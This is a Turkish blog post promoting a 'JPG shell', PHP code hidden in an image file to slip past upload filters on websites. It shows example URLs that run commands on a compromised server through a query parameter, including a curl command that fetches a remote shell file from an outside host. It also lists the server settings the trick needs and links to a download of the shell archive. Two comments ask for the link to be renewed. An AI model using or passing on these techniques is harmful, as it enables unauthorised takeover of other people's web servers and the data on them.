Her upload yapılabilen sitelerden shell sokamazsınız çogu yer .php uzantıları yasaklar buna karşılık bu shelli kullanabilirsiniz... kesin olarak bu jpg dosyalarını attıgınızda shell sokamazsınız ama işe yaradıgını bizzat kendim test ederek gördüm.. Upload olan siteden sunucumuza verdigim jpg uzantılı shelleri yükleyip yüklendigi yerleri bulduktan sonra
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=id
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=ls -lia
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=curl -o shell.php shelladresi.com/shell.txt gibi linux komutları ile shell yüklüyebiliriz..burda yapılan işlem resmin içine php kodu saklıyarak ufak bir 4 kb resim dosyasının içindeki php kodlarla sunucuda code injection yapmaktır bu işlemi yapabilmek içinde Safe Mode : Off ve sunucuda system ile passthru fonksionlarının aynı zamanda fopen açık olması lazım..
Dosya Download Link : http://www.dosya.tc/download/UECzwH/ege_jpg_shell.rar.html
Windows 98 işletim sistemi kullananlar yorum olarak adresini yazsın
2 yorum :
LÜTFEN LİNKİ YENİLERMİSİNİZ ???
dostum rica etsem yenilermisin linki :)
Yorum Gönder